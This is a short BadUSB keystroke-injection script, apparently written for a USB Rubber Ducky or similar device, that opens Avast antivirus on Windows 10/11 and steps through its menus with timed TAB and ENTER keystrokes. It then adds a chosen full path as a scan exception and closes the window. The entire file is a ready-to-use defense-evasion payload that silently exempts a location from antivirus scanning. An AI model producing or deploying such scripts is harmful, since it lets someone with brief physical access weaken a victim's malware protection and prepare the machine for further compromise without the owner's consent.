* ########################################################
* #                                                      |
* # Title        : Add An Exception To Avast Antivirus   |
* # Author       : Aleff                                 |
* # Version      : 1.0                                   |
* # Category     : Execute                               |
* # Target       : Windows 10/11                         |
* #                                                      |
* ########################################################


* Requirements:
*     - Avast installed and configured


* Open Avast application
DELAY 2000
GUI
DELAY 1000
STRING avast
DELAY 1000
ENTER

* Go to Avast menu
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER

* Go to Avast settings
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER

* Go to Exceptions menu
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER

* Add Exception button
DELAY 500
TAB
DELAY 500
ENTER

* Write the full-path and then close the Avast app
DELAY 1000
TAB
DELAY 500

* Set the full-path that you want to set as exception
STRING FULL-PATH
DELAY 500
TAB
DELAY 500
ENTER
DELAY 1000
ALT F4
